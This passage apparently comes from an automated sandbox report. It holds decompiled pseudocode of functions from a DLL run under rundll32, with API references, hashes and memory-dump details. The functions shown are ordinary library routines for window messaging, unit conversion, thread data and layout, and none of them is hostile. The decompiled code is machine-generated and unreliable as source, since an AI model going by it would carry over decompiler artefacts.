                                                                        • Opcode ID: 19a7042d3ee7ac9ff937cd3b65bdcc34620a1ee98de378f8268fb43055ccdf2e
                                                                        • Instruction ID: f32dedf2229806a380f5c1e0926675dad0c5831b186d9175a334cabdc35765a6
                                                                        • Opcode Fuzzy Hash: 19a7042d3ee7ac9ff937cd3b65bdcc34620a1ee98de378f8268fb43055ccdf2e
                                                                        • Instruction Fuzzy Hash: 7931D435C00258BECB25DBA4EC84AFDB7B8FF56250F90421AF456E7151DB30AE85CB50
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 100%
                                                                        			E100316E6(void* __ecx, unsigned int _a4) {
                                                                        				struct HWND__* _t20;
                                                                        				void* _t23;
                                                                        				void* _t33;
                                                                        				void* _t34;
                                                                        				struct HWND__* _t35;
                                                                        
                                                                        				_t34 = __ecx;
                                                                        				if((E100202AB(__ecx) & 0x40000000) == 0) {
                                                                        					_t33 = E10022AD5(__ecx);
                                                                        				} else {
                                                                        					_t33 = __ecx;
                                                                        				}
                                                                        				if((_a4 & 0x0000000c) != 0) {
                                                                        					_t23 = E100203CE(_t33);
                                                                        					if(( !(_a4 >> 3) & 0x00000001) == 0 || _t23 == 0 || _t33 == _t34) {
                                                                        						SendMessageA( *(_t33 + 0x1c), 0x86, 0, 0);
                                                                        					} else {
                                                                        						 *(_t34 + 0x39) =  *(_t34 + 0x39) | 0x00000002;
                                                                        						SendMessageA( *(_t33 + 0x1c), 0x86, 1, 0);
                                                                        						 *(_t34 + 0x39) =  *(_t34 + 0x39) & 0x000000fd;
                                                                        					}
                                                                        				}
                                                                        				_t20 = GetWindow(GetDesktopWindow(), 5);
                                                                        				while(1) {
                                                                        					_t35 = _t20;
                                                                        					if(_t35 == 0) {
                                                                        						break;
                                                                        					}
                                                                        					if(E100310CC( *(_t33 + 0x1c), _t35) != 0) {
                                                                        						SendMessageA(_t35, 0x36d, _a4, 0);
                                                                        					}
                                                                        					_t20 = GetWindow(_t35, 2);
                                                                        				}
                                                                        				return _t20;
                                                                        			}









                                                                        APIs
                                                                          • Part of subcall function 100202AB: GetWindowLongA.USER32 ref: 100202B6
                                                                        • SendMessageA.USER32 ref: 1003173F
                                                                        • SendMessageA.USER32 ref: 10031753
                                                                        • GetDesktopWindow.USER32 ref: 10031757
                                                                        • SendMessageA.USER32 ref: 1003177F
                                                                        • GetWindow.USER32(00000000), ref: 10031784
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.438224128.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 00000003.00000002.438218556.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000003.00000002.438269645.000000001003C000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000003.00000002.438284622.000000001004B000.00000004.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000003.00000002.438290903.0000000010051000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000003.00000002.438363852.000000001009A000.00000002.00000001.01000000.00000005.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                        Similarity
                                                                        • API ID: MessageSendWindow$DesktopLong
                                                                        • String ID:
                                                                        • API String ID: 2272707703-0
                                                                        • Opcode ID: 73e2593b8f262eaeb4f4e94dd705a49f5985a06933a3941b6edb2e6593d9f2be
                                                                        • Instruction ID: b2d0115702f01622c71e7e90a3c3b5da49a9f5b0f30be2a1795dd18db7154202
                                                                        • Opcode Fuzzy Hash: 73e2593b8f262eaeb4f4e94dd705a49f5985a06933a3941b6edb2e6593d9f2be
                                                                        • Instruction Fuzzy Hash: AC1106312447156BE333CA219C86FDE7ABAEF4AB91F154114F6409E1D2CF91EC418395
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 100%
                                                                        			E10031E6F(void* __ebx, intOrPtr __ecx, void* __edi, void* __esi, struct HWND__* _a4, unsigned int _a8) {
                                                                        				intOrPtr _v8;
                                                                        				char _v268;
                                                                        				intOrPtr _v272;
                                                                        				intOrPtr _t20;
                                                                        				int _t24;
                                                                        				unsigned int _t45;
                                                                        				intOrPtr _t52;
                                                                        
                                                                        				_t20 =  *0x1004c470; // 0x1bfbe703
                                                                        				_v8 = _t20;
                                                                        				_v272 = __ecx;
                                                                        				_t52 =  *((intOrPtr*)(E100373B5() + 4));
                                                                        				if(_t52 != 0 && _a8 != 0) {
                                                                        					_t45 = _a8 >> 0x10;
                                                                        					if(_t45 != 0) {
                                                                        						_t24 =  *(_t52 + 0x8c);
                                                                        						if(_a8 == _t24 && _t45 ==  *(_t52 + 0x8e)) {
                                                                        							GlobalGetAtomNameA(_t24,  &_v268, 0x103);
                                                                        							GlobalAddAtomA( &_v268);
                                                                        							GlobalGetAtomNameA(0,  &_v268, 0x103);
                                                                        							GlobalAddAtomA( &_v268);
                                                                        							SendMessageA(_a4, 0x3e4,  *(_v272 + 0x1c), ( *(_t52 + 0x8e) & 0x0000ffff) << 0x00000010 |  *(_t52 + 0x8c) & 0x0000ffff);
                                                                        						}
                                                                        					}
                                                                        				}
                                                                        				return E100117AE(0, _v8);
                                                                        			}











                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.438224128.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 00000003.00000002.438218556.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000003.00000002.438269645.000000001003C000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000003.00000002.438284622.000000001004B000.00000004.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000003.00000002.438290903.0000000010051000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000003.00000002.438363852.000000001009A000.00000002.00000001.01000000.00000005.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                        Similarity
                                                                        • API ID: AtomGlobal$Name$MessageSend
                                                                        • String ID:
                                                                        • API String ID: 1515195355-0
                                                                        • Opcode ID: 18f948bbb074b7511017b7146c05a941aef01dbd5fd54326c2498a16bdc2d2e7
                                                                        • Instruction ID: 486b4a3070eef5cedf278f6f896eb776bbd2baf7572d0ea587dcdbf0f4b3db2c
                                                                        • Opcode Fuzzy Hash: 18f948bbb074b7511017b7146c05a941aef01dbd5fd54326c2498a16bdc2d2e7
                                                                        • Instruction Fuzzy Hash: 301130759001189EDB51DB65CC90AEAB3F8FF18740F408455E599DB141DBB4AAC1CF60
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 82%
                                                                        			E10033E13(intOrPtr* __ecx, int* _a4) {
                                                                        				int _v8;
                                                                        				int _t12;
                                                                        				int _t14;
                                                                        				int _t22;
                                                                        				int _t32;
                                                                        				int* _t36;
                                                                        
                                                                        				_push(__ecx);
                                                                        				_t35 = __ecx;
                                                                        				if(__ecx == 0) {
                                                                        					_t22 =  *0x1004efa8; // 0x60
                                                                        					_t12 =  *0x1004efac; // 0x60
                                                                        					goto L6;
                                                                        				} else {
                                                                        					_t32 = GetMapMode( *(__ecx + 8));
                                                                        					if(_t32 >= 7 || _t32 == 1) {
                                                                        						_t22 = GetDeviceCaps( *(_t35 + 8), 0x58);
                                                                        						_t12 = GetDeviceCaps( *(_t35 + 8), 0x5a);
                                                                        						L6:
                                                                        						_t36 = _a4;
                                                                        						_v8 = _t12;
                                                                        						 *_t36 = MulDiv( *_t36, 0x9ec, _t22);
                                                                        						_t14 = MulDiv(_t36[1], 0x9ec, _v8);
                                                                        						_t36[1] = _t14;
                                                                        					} else {
                                                                        						_push(3);
                                                                        						 *((intOrPtr*)( *__ecx + 0x34))();
                                                                        						E10028F83(__ecx, _a4);
                                                                        						_push(_t32);
                                                                        						_t14 =  *((intOrPtr*)( *__ecx + 0x34))();
                                                                        					}
                                                                        				}
                                                                        				return _t14;
                                                                        			}










                                                                        APIs
                                                                        • GetMapMode.GDI32(?,?,?,?,?,?,1000A1B6,?,00000000,?,74778B90), ref: 10033E23
                                                                        • GetDeviceCaps.GDI32(?,00000058), ref: 10033E5D
                                                                        • GetDeviceCaps.GDI32(?,0000005A), ref: 10033E66
                                                                          • Part of subcall function 10028F83: MulDiv.KERNEL32(?,00000000,00000000), ref: 10028FC3
                                                                          • Part of subcall function 10028F83: MulDiv.KERNEL32(00000000,00000000,00000000), ref: 10028FE0
                                                                        • MulDiv.KERNEL32(?,000009EC,00000060), ref: 10033E8A
                                                                        • MulDiv.KERNEL32(00000000,000009EC,74778B90), ref: 10033E95
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.438224128.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 00000003.00000002.438218556.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000003.00000002.438269645.000000001003C000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000003.00000002.438284622.000000001004B000.00000004.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000003.00000002.438290903.0000000010051000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000003.00000002.438363852.000000001009A000.00000002.00000001.01000000.00000005.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                        Similarity
                                                                        • API ID: CapsDevice$Mode
                                                                        • String ID:
                                                                        • API String ID: 696222070-0
                                                                        • Opcode ID: bc12bf045409c33661820cc2be5f7907c0cdbee5fcc122a38f5508f39634e8b5
                                                                        • Instruction ID: 1735433994fc482824355aeef04517b355e33a0d4513a8ab2ef99d7773c3569a
                                                                        • Opcode Fuzzy Hash: bc12bf045409c33661820cc2be5f7907c0cdbee5fcc122a38f5508f39634e8b5
                                                                        • Instruction Fuzzy Hash: AA11E135600614EFEB229F65CC84C0EBBEAEF89751B118429F9859B3A1C771ED018F90
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 83%
                                                                        			E10033EA1(intOrPtr* __ecx, int* _a4) {
                                                                        				int _v8;
                                                                        				int _t12;
                                                                        				int _t14;
                                                                        				int _t30;
                                                                        				int _t33;
                                                                        				int* _t36;
                                                                        
                                                                        				_push(__ecx);
                                                                        				_t35 = __ecx;
                                                                        				if(__ecx == 0) {
                                                                        					_t30 =  *0x1004efa8; // 0x60
                                                                        					_t12 =  *0x1004efac; // 0x60
                                                                        					goto L6;
                                                                        				} else {
                                                                        					_t33 = GetMapMode( *(__ecx + 8));
                                                                        					if(_t33 >= 7 || _t33 == 1) {
                                                                        						_t30 = GetDeviceCaps( *(_t35 + 8), 0x58);
                                                                        						_t12 = GetDeviceCaps( *(_t35 + 8), 0x5a);
                                                                        						L6:
                                                                        						_t36 = _a4;
                                                                        						_v8 = _t12;
                                                                        						 *_t36 = MulDiv( *_t36, _t30, 0x9ec);
                                                                        						_t10 =  &(_t36[1]); // 0x4689ec45
                                                                        						_t14 = MulDiv( *_t10, _v8, 0x9ec);
                                                                        						_t36[1] = _t14;
                                                                        					} else {
                                                                        						_push(3);
                                                                        						 *((intOrPtr*)( *__ecx + 0x34))();
                                                                        						E10028F1A(__ecx, _a4);
                                                                        						_push(_t33);
                                                                        						_t14 =  *((intOrPtr*)( *__ecx + 0x34))();
                                                                        					}
                                                                        				}
                                                                        				return _t14;
                                                                        			}










                                                                        APIs
                                                                        • GetMapMode.GDI32(?,00000000,?,?,?,?,1000A1EA,?), ref: 10033EB1
                                                                        • GetDeviceCaps.GDI32(?,00000058), ref: 10033EEB
                                                                        • GetDeviceCaps.GDI32(?,0000005A), ref: 10033EF4
                                                                          • Part of subcall function 10028F1A: MulDiv.KERNEL32(1000A1EA,00000000,00000000), ref: 10028F5A
                                                                          • Part of subcall function 10028F1A: MulDiv.KERNEL32(4689EC45,00000000,00000000), ref: 10028F77
                                                                        • MulDiv.KERNEL32(1000A1EA,00000060,000009EC), ref: 10033F18
                                                                        • MulDiv.KERNEL32(4689EC45,?,000009EC), ref: 10033F23
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.438224128.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 00000003.00000002.438218556.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000003.00000002.438269645.000000001003C000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000003.00000002.438284622.000000001004B000.00000004.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000003.00000002.438290903.0000000010051000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000003.00000002.438363852.000000001009A000.00000002.00000001.01000000.00000005.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                        Similarity
                                                                        • API ID: CapsDevice$Mode
                                                                        • String ID:
                                                                        • API String ID: 696222070-0
                                                                        • Opcode ID: 833bac8d30de56bf327d299826c07e3a3159bd3f9899bf9753b6f554495b0d72
                                                                        • Instruction ID: d9f530c2cd1e86ac66058578f4e3f5f9ceac98c77ead6ae7da37ff5c198008ea
                                                                        • Opcode Fuzzy Hash: 833bac8d30de56bf327d299826c07e3a3159bd3f9899bf9753b6f554495b0d72
                                                                        • Instruction Fuzzy Hash: 6D11C235600614EFE7229F65CC84C0EBBFAEF85752B118429F9859B361C771EC018F90
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 41%
                                                                        			E1001519D(void* __edi) {
                                                                        				void* __ebx;
                                                                        				void* __esi;
                                                                        				long _t5;
                                                                        				long _t11;
                                                                        				long _t12;
                                                                        				long* _t17;
                                                                        
                                                                        				_t5 = GetLastError();
                                                                        				_t12 = _t5;
                                                                        				_t17 =  *0x1004f5e0( *0x1004c848);
                                                                        				_t18 = _t17;
                                                                        				if(_t17 == 0) {
                                                                        					_push(0x8c);
                                                                        					_push(1);
                                                                        					_t17 = E1001382A(_t12, __edi, _t17, _t18);
                                                                        					if(_t17 == 0) {
                                                                        						L4:
                                                                        						E10011400(0x10);
                                                                        					} else {
                                                                        						_push(_t17);
                                                                        						_push( *0x1004c848);
                                                                        						if( *0x1004f5e4() == 0) {
                                                                        							goto L4;
                                                                        						} else {
                                                                        							_t17[0x15] = 0x1004cb00;
                                                                        							_t17[5] = 1;
                                                                        							_t11 = GetCurrentThreadId();
                                                                        							_t17[1] = _t17[1] | 0xffffffff;
                                                                        							 *_t17 = _t11;
                                                                        						}
                                                                        					}
                                                                        				}
                                                                        				SetLastError(_t12);
                                                                        				return _t17;
                                                                        			}










                                                                        APIs
                                                                        • GetLastError.KERNEL32(?,00000000,100136FA,100139FA,00000000,10041E50,00000008,10013A51,?,?,?,10015293,0000000D,10041EB0,00000010,10015375), ref: 1001519F
                                                                        • FlsGetValue.KERNEL32(?,10015293,0000000D,10041EB0,00000010,10015375,?,10011310,00000000,?,?,10011379,?,?,?,10041D40), ref: 100151AD
                                                                        • SetLastError.KERNEL32(00000000,?,10015293,0000000D,10041EB0,00000010,10015375,?,10011310,00000000,?,?,10011379,?,?,?), ref: 10015203
                                                                          • Part of subcall function 1001382A: __lock.LIBCMT ref: 1001386E
                                                                          • Part of subcall function 1001382A: RtlAllocateHeap.NTDLL(00000008,?,10041E40,00000010,100151C5,00000001,0000008C,?,10015293,0000000D,10041EB0,00000010,10015375,?,10011310,00000000), ref: 100138AC
                                                                        • FlsSetValue.KERNEL32(00000000,?,10015293,0000000D,10041EB0,00000010,10015375,?,10011310,00000000,?,?,10011379,?,?,?), ref: 100151D4
                                                                        • GetCurrentThreadId.KERNEL32 ref: 100151EC
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.438224128.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 00000003.00000002.438218556.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000003.00000002.438269645.000000001003C000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000003.00000002.438284622.000000001004B000.00000004.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000003.00000002.438290903.0000000010051000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000003.00000002.438363852.000000001009A000.00000002.00000001.01000000.00000005.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                        Similarity
                                                                        • API ID: ErrorLastValue$AllocateCurrentHeapThread__lock
                                                                        • String ID:
                                                                        • API String ID: 1487844433-0
                                                                        • Opcode ID: b2f315a77b2b4df7a3c1e85649ddbe99070d14f731bb33650b41be055e3ed3d9
                                                                        • Instruction ID: 04c9e0168ef1b4a2d5000d056184ae8950552c627320cfc90ecd4b0af594dd98
                                                                        • Opcode Fuzzy Hash: b2f315a77b2b4df7a3c1e85649ddbe99070d14f731bb33650b41be055e3ed3d9
                                                                        • Instruction Fuzzy Hash: F4F0C2326017269FE3225F648C49E463BE0EB017A2F104219F942CE1E1DFB5C8808794
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 100%
                                                                        			E10016B44() {
                                                                        				struct _FILETIME _v12;
                                                                        				signed int _v16;
                                                                        				union _LARGE_INTEGER _v20;
                                                                        				signed int _t7;
                                                                        				signed int _t9;
                                                                        				signed int _t10;
                                                                        				signed int _t11;
                                                                        				signed int _t15;
                                                                        				signed int _t22;
                                                                        
                                                                        				_t7 =  *0x1004c470; // 0x1bfbe703
                                                                        				if(_t7 == 0 || _t7 == 0xbb40e64e) {
                                                                        					GetSystemTimeAsFileTime( &_v12);
                                                                        					_t9 = GetCurrentProcessId();
                                                                        					_t10 = GetCurrentThreadId();
                                                                        					_t11 = GetTickCount();
                                                                        					QueryPerformanceCounter( &_v20);
                                                                        					_t15 = _v16 ^ _v20.LowPart;
                                                                        					_t22 = _v12.dwHighDateTime ^ _v12.dwLowDateTime ^ _t9 ^ _t10 ^ _t11 ^ _t15;
                                                                        					 *0x1004c470 = _t22;
                                                                        					if(_t22 == 0) {
                                                                        						 *0x1004c470 = 0xbb40e64e;
                                                                        					}
                                                                        					return _t15;
                                                                        				}
                                                                        				return _t7;
                                                                        			}













                                                                        APIs
                                                                        • GetSystemTimeAsFileTime.KERNEL32(?), ref: 10016B5F
                                                                        • GetCurrentProcessId.KERNEL32 ref: 10016B6B
                                                                        • GetCurrentThreadId.KERNEL32 ref: 10016B73
                                                                        • GetTickCount.KERNEL32 ref: 10016B7B
                                                                        • QueryPerformanceCounter.KERNEL32(?), ref: 10016B87
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.438224128.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 00000003.00000002.438218556.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000003.00000002.438269645.000000001003C000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000003.00000002.438284622.000000001004B000.00000004.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000003.00000002.438290903.0000000010051000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000003.00000002.438363852.000000001009A000.00000002.00000001.01000000.00000005.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                        Similarity
                                                                        • API ID: CurrentTime$CountCounterFilePerformanceProcessQuerySystemThreadTick
                                                                        • String ID:
                                                                        • API String ID: 1445889803-0
                                                                        • Opcode ID: c4e665b203c20cf87cd8f2106384ef992f2c3d3f5cabc43c5d4d3063469ed334
                                                                        • Instruction ID: 11add00fd643567121de8b49d98352c3af742b412758f19a40badcee8712c011
                                                                        • Opcode Fuzzy Hash: c4e665b203c20cf87cd8f2106384ef992f2c3d3f5cabc43c5d4d3063469ed334
                                                                        • Instruction Fuzzy Hash: 21F0FF72C012289FDB11DBF5CE8899AB7F8FF4E355B820551D841EB111DB30D9419B80
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 63%
                                                                        			E1002C1A7(intOrPtr* __ecx, intOrPtr* _a4, signed int _a8, signed int _a12) {
                                                                        				signed int _v8;
                                                                        				signed int _v12;
                                                                        				signed int _v16;
                                                                        				intOrPtr _v20;
                                                                        				intOrPtr* _v24;
                                                                        				signed int _v32;
                                                                        				struct tagRECT _v48;
                                                                        				signed int _v52;
                                                                        				signed int _v56;
                                                                        				struct tagRECT _v72;
                                                                        				void* __ebx;
                                                                        				void* __edi;
                                                                        				void* __esi;
                                                                        				void* __ebp;
                                                                        				intOrPtr _t170;
                                                                        				signed int _t171;
                                                                        				intOrPtr* _t172;
                                                                        				signed int _t175;
                                                                        				signed int _t177;
                                                                        				intOrPtr* _t179;
                                                                        				signed char _t183;
                                                                        				signed int _t184;
                                                                        				signed int _t186;
                                                                        				intOrPtr* _t200;
                                                                        				intOrPtr* _t204;
                                                                        				signed int _t220;
                                                                        				intOrPtr* _t223;
                                                                        				signed char _t233;
                                                                        				signed int _t247;
                                                                        				signed int _t249;
                                                                        				signed int _t258;
                                                                        				signed int _t261;
                                                                        				signed int _t266;
                                                                        				signed int _t268;
                                                                        				intOrPtr _t270;
                                                                        				signed int _t273;
                                                                        				intOrPtr _t275;
                                                                        				signed int _t277;
                                                                        				intOrPtr* _t282;
                                                                        
                                                                        				_t268 = 0;
                                                                        				_push(0);
                                                                        				_t223 = __ecx;
                                                                        				_push(0);
                                                                        				_push(0x418);
                                                                        				_v16 = 0;
                                                                        				_v56 = 0;
                                                                        				_v52 = 0;
                                                                        				_t277 =  *((intOrPtr*)( *__ecx + 0x110))();
                                                                        				_v32 = _t277;
                                                                        				if(_t277 != 0) {
                                                                        					_t175 = E1001F77E(_t277 + _t277 * 4 << 2);
                                                                        					_v16 = _t175;
                                                                        					if(_t277 > 0) {
                                                                        						_v12 = _t175;
                                                                        						do {
                                                                        							E1002B71F(_t223, _t268, _v12);
                                                                        							_v12 = _v12 + 0x14;
                                                                        							_t268 = _t268 + 1;
                                                                        						} while (_t268 < _t277);
                                                                        						_t270 = _v16;
                                                                        						_t177 = 0;
                                                                        						if(_t277 > 0) {
                                                                        							_t233 =  *(_t223 + 0x7c);
                                                                        							if((_t233 & 0x00000002) == 0) {
                                                                        								_t266 = _t233 & 0x00000004;
                                                                        								_v48.bottom = _t266;
                                                                        								if(_t266 == 0) {
                                                                        									L19:
                                                                        									_push(_t177);
                                                                        									asm("sbb eax, eax");
                                                                        									_t177 =  ~(_a8 & 0x00000002) & 0x00007fff;
                                                                        									__eflags = _t177;
                                                                        									goto L20;
                                                                        								} else {
                                                                        									if((_a8 & 0x00000004) != 0) {
                                                                        										L18:
                                                                        										_push(_t177);
                                                                        										_push( *((intOrPtr*)(_t223 + 0x6c)));
                                                                        									} else {
                                                                        										if((_a8 & 0x00000008) == 0) {
                                                                        											__eflags = _a8 & 0x00000010;
                                                                        											if((_a8 & 0x00000010) == 0) {
                                                                        												__eflags = _a12 - 0xffffffff;
                                                                        												if(_a12 == 0xffffffff) {
                                                                        													__eflags = _t233 & 0x00000001;
                                                                        													if((_t233 & 0x00000001) == 0) {
                                                                        														goto L19;
                                                                        													} else {
                                                                        														goto L18;
                                                                        													}
                                                                        												} else {
                                                                        													SetRectEmpty( &_v48);
                                                                        													 *((intOrPtr*)( *_t223 + 0x13c))( &_v48, _a8 & 0x00000002);
                                                                        													_t220 = _a8 & 0x00000020;
                                                                        													__eflags = _t220;
                                                                        													if(_t220 == 0) {
                                                                        														_t258 = _v48.right - _v48.left;
                                                                        														__eflags = _t258;
                                                                        													} else {
                                                                        														_t258 = _v48.bottom - _v48.top;
                                                                        													}
                                                                        													_push(_t220);
                                                                        													_push(_t258 + _a12);
                                                                        												}
                                                                        											} else {
                                                                        												_push(0);
                                                                        												L20:
                                                                        												_push(_t177);
                                                                        											}
                                                                        										} else {
                                                                        											_push(0);
                                                                        											_push(0x7fff);
                                                                        										}
                                                                        									}
                                                                        								}
                                                                        								_push(_t277);
                                                                        								_push(_t270);
                                                                        								E1002BCF4(_t223, _t266);
                                                                        							}
                                                                        							_push(_t277);
                                                                        							_push(_t270);
                                                                        							_push( &(_v48.right));
                                                                        							_t179 = E1002BBD2(_t223);
                                                                        							_v56 =  *_t179;
                                                                        							_v52 =  *((intOrPtr*)(_t179 + 4));
                                                                        							if((_a8 & 0x00000040) != 0) {
                                                                        								_t261 = 0;
                                                                        								_v8 = 0;
                                                                        								_a12 = 0;
                                                                        								_v48.bottom =  *((intOrPtr*)(_t223 + 0x9c));
                                                                        								 *((intOrPtr*)(_t223 + 0x9c)) = 0;
                                                                        								if(_t277 > 0) {
                                                                        									_t200 = _t270 + 4;
                                                                        									_v24 = _t200;
                                                                        									_t247 = _t277;
                                                                        									do {
                                                                        										if(( *(_t200 + 5) & 0x00000001) != 0 &&  *_t200 != 0) {
                                                                        											_t261 = _t261 + 1;
                                                                        										}
                                                                        										_t200 = _t200 + 0x14;
                                                                        										_t247 = _t247 - 1;
                                                                        									} while (_t247 != 0);
                                                                        									_a12 = _t261;
                                                                        									if(_t261 > 0) {
                                                                        										_t273 = E1001F77E(_t261 + _t261 * 2 << 3);
                                                                        										if(_t273 == 0) {
                                                                        											_t64 =  &_v8;
                                                                        											 *_t64 = _v8 & 0x00000000;
                                                                        											__eflags =  *_t64;
                                                                        										} else {
                                                                        											E1002B8AD(_t273, 0x18, _a12, 0x1002be80);
                                                                        											_v8 = _t273;
                                                                        										}
                                                                        										_a12 = _a12 & 0x00000000;
                                                                        										_v12 = _v12 & 0x00000000;
                                                                        										_t204 = _v24;
                                                                        										_t275 = _v8 + 8;
                                                                        										_v20 = _t275;
                                                                        										_v24 = _t204;
                                                                        										do {
                                                                        											if(( *(_t204 + 5) & 0x00000001) != 0 &&  *_t204 != 0) {
                                                                        												_t249 = _v12;
                                                                        												 *((intOrPtr*)(_t275 - 8)) = _t249;
                                                                        												 *((intOrPtr*)(_t275 - 4)) =  *_t204;
                                                                        												 *((intOrPtr*)( *_t223 + 0x16c))(_t249,  &_v72);
                                                                        												E10028E96(_t223,  &_v72);
                                                                        												_a12 = _a12 + 1;
                                                                        												_v20 = _v20 + 0x18;
                                                                        												_t204 = _v24;
                                                                        												asm("movsd");
                                                                        												asm("movsd");
                                                                        												asm("movsd");
                                                                        												asm("movsd");
                                                                        												_t277 = _v32;
                                                                        												_t275 = _v20;
                                                                        											}
                                                                        											_v12 = _v12 + 1;
                                                                        											_t204 = _t204 + 0x14;
                                                                        											_v24 = _t204;
                                                                        										} while (_v12 < _t277);
                                                                        									}
                                                                        								}
                                                                        								_t183 =  *(_t223 + 0x7c);
                                                                        								if((_t183 & 0x00000001) != 0 && (_t183 & 0x00000004) != 0) {
                                                                        									 *((intOrPtr*)(_t223 + 0x6c)) = _v56;
                                                                        								}
                                                                        								_t271 = 0;
                                                                        								_t307 = _t277;
                                                                        								if(_t277 > 0) {
                                                                        									_v20 = _v16;
                                                                        									do {
                                                                        										E1002B9F8(_t223, _t223, _t271, _t277, _t307, _t271, _v20);
                                                                        										_v20 = _v20 + 0x14;
                                                                        										_t271 = _t271 + 1;
                                                                        									} while (_t271 < _t277);
                                                                        								}
                                                                        								_t184 = _a12;
                                                                        								if(_t184 > 0) {
                                                                        									_t282 = _v8 + 8;
                                                                        									_a12 = _t184;
                                                                        									do {
                                                                        										_t186 = E10020230(_t223,  *((intOrPtr*)(_t282 - 4)));
                                                                        										_v32 = _t186;
                                                                        										if(_t186 != 0) {
                                                                        											GetWindowRect( *(_t186 + 0x1c),  &_v72);
                                                                        											_t271 = _v72.left -  *_t282;
                                                                        											_v24 = _v72.top -  *((intOrPtr*)(_t282 + 4));
                                                                        											 *((intOrPtr*)( *_t223 + 0x16c))( *((intOrPtr*)(_t282 - 8)),  &_v72);
                                                                        											E100204FE(_v32, 0, _v72.left + _v72.left -  *_t282, _v24 + _v72.top, 0, 0, 0x15);
                                                                        										}
                                                                        										_t282 = _t282 + 0x18;
                                                                        										_t125 =  &_a12;
                                                                        										 *_t125 = _a12 - 1;
                                                                        										_t313 =  *_t125;
                                                                        									} while ( *_t125 != 0);
                                                                        									_push(_v8);
                                                                        									L1001F7A9(_t223, _t271, _t282, _t313);
                                                                        								}
                                                                        								_t270 = _v16;
                                                                        								 *((intOrPtr*)(_t223 + 0x9c)) = _v48.bottom;
                                                                        							}
                                                                        							_push(_t270);
                                                                        							L1001F7A9(_t223, _t270, _t277, _t313);
                                                                        						}
                                                                        					}
                                                                        				}
                                                                        				SetRectEmpty( &_v72);
                                                                        				 *((intOrPtr*)( *_t223 + 0x13c))( &_v72, _a8 & 0x00000002);
                                                                        				_v52 = _v52 + _v72.top - _v72.bottom;
                                                                        				_v56 = _v56 + _v72.left - _v72.right;
                                                                        				E1002F49A( &(_v48.right), _a8 & 0x00000001, _a8 & 0x00000002);
                                                                        				_t170 = _v48.right;
                                                                        				if(_v56 <= _t170) {
                                                                        					_v56 = _t170;
                                                                        				}
                                                                        				_t171 = _v48.bottom;
                                                                        				if(_v52 <= _t171) {
                                                                        					_v52 = _t171;
                                                                        				}
                                                                        				_t172 = _a4;
                                                                        				 *_t172 = _v56;
                                                                        				 *(_t172 + 4) = _v52;
                                                                        				return _t172;
                                                                        			}










































                                                                        0x1002c49a
                                                                        0x1002c4a5
                                                                        0x1002c4b3
                                                                        0x1002c4b8
